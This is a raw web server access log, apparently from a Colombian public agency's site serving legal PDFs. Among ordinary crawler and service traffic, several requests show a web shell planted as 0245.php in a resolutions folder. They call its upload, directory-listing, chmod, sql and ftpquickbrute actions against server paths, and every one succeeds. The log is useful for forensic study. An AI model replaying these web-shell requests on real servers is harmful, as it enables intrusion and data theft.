201.245.192.253 - - [22/Mar/2024:02:28:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38073
201.245.192.253 - - [22/Mar/2024:02:28:58 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [22/Mar/2024:02:29:05 -0500] "GET /BLA/boletinlegal/Circulares/2024/CIRCULAR%20No.%2000003%20DEL%2016%20DE%20FEBRERO%20DEL%202024.pdf HTTP/1.1" 200 262750
201.245.192.253 - - [22/Mar/2024:02:29:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [22/Mar/2024:02:29:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37767
66.249.66.21 - - [22/Mar/2024:02:29:33 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202022/7820.pdf HTTP/1.1" 200 392000
172.22.2.4 - - [22/Mar/2024:02:27:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59583
201.245.192.253 - - [22/Mar/2024:02:29:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
172.22.2.4 - - [22/Mar/2024:02:30:12 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [22/Mar/2024:02:30:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [22/Mar/2024:02:30:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [22/Mar/2024:02:30:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [22/Mar/2024:02:30:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [22/Mar/2024:02:30:13 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [22/Mar/2024:02:30:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [22/Mar/2024:02:30:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [22/Mar/2024:02:30:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [22/Mar/2024:02:30:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [22/Mar/2024:02:30:13 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
201.245.192.253 - - [22/Mar/2024:02:30:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [22/Mar/2024:02:30:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38073
52.167.144.216 - - [22/Mar/2024:02:30:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0372.pdf HTTP/1.1" 304 -
216.245.221.92 - - [22/Mar/2024:02:31:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [22/Mar/2024:02:32:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
40.77.167.78 - - [22/Mar/2024:02:32:43 -0500] "GET /BLA/resoluciones/AUTOS%202016/2799.pdf HTTP/1.1" 304 -
40.77.167.78 - - [22/Mar/2024:02:32:44 -0500] "GET /BLA/resoluciones/AUTOS%202013/0026.pdf HTTP/1.1" 200 2439276
201.245.192.253 - - [22/Mar/2024:02:33:50 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
47.128.34.141 - - [22/Mar/2024:02:34:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=upload&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbre HTTP/1.1" 200 2826
47.128.21.148 - - [22/Mar/2024:02:34:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=d&d=C%3A%5CUsers%5C.. HTTP/1.1" 200 2713
201.245.192.253 - - [22/Mar/2024:02:34:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [22/Mar/2024:02:32:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.165 - - [22/Mar/2024:02:34:38 -0500] "GET /portaldeninos/2021/05/30/gestion-del-riesgo/ HTTP/1.1" 200 94036
201.245.192.253 - - [22/Mar/2024:02:34:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
162.55.35.116 - - [22/Mar/2024:02:34:50 -0500] "GET / HTTP/1.1" 200 4720
47.128.47.195 - - [22/Mar/2024:02:34:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=C%3A%5C&f=cumbre HTTP/1.1" 200 2792
47.128.27.242 - - [22/Mar/2024:02:35:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=tools&d=E%3A%5Cnuevo%5Chtdocs%5Ccss%5C HTTP/1.1" 200 3009
172.22.2.4 - - [22/Mar/2024:02:33:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [22/Mar/2024:02:33:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45104
47.128.113.7 - - [22/Mar/2024:02:35:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=d&d=E%3A%5Cnuevo%5Chtdocs%5Csig%5CGesti%F3n+de+Recursos+Inform%E1ticos+y+Tecnol%F3gicos HTTP/1.1" 200 2787
172.22.2.4 - - [22/Mar/2024:02:34:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
20.240.18.32 - - [22/Mar/2024:02:35:56 -0500] "GET /Publicaciones/2023EE280089.pdf HTTP/1.1" 404 228
201.245.192.253 - - [22/Mar/2024:02:36:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [22/Mar/2024:02:34:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 37974
47.128.44.12 - - [22/Mar/2024:02:36:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=sql&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C HTTP/1.1" 200 3034
172.22.2.4 - - [22/Mar/2024:02:34:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 46633
201.245.192.253 - - [22/Mar/2024:02:36:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [22/Mar/2024:02:36:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [22/Mar/2024:02:38:15 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [22/Mar/2024:02:38:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [22/Mar/2024:02:38:55 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [22/Mar/2024:02:38:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37048
201.245.192.253 - - [22/Mar/2024:02:38:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38073
201.245.192.253 - - [22/Mar/2024:02:39:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37767
201.245.192.253 - - [22/Mar/2024:02:39:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
47.128.97.139 - - [22/Mar/2024:02:40:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5Csig&f=Control+y+mejora HTTP/1.1" 200 2856
172.22.2.4 - - [22/Mar/2024:02:38:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [22/Mar/2024:02:40:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38073
47.128.20.227 - - [22/Mar/2024:02:40:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ftpquickbrute&d=E%3A%5Cnuevo%5Chtdocs%5Cdpsia%5C HTTP/1.1" 200 2819
201.245.192.253 - - [22/Mar/2024:02:41:03 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [22/Mar/2024:02:39:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [22/Mar/2024:02:41:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [22/Mar/2024:02:41:53 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.20 - - [22/Mar/2024:02:42:22 -0500] "GET /Publicaciones/2024EE10315.pdf HTTP/1.1" 404 227
201.245.192.253 - - [22/Mar/2024:02:43:03 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [22/Mar/2024:02:44:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [22/Mar/2024:02:44:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
201.245.192.253 - - [22/Mar/2024:02:45:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [22/Mar/2024:02:46:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [22/Mar/2024:02:44:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [22/Mar/2024:02:46:53 -0500] "HEAD / HTTP/1.1" 200 -
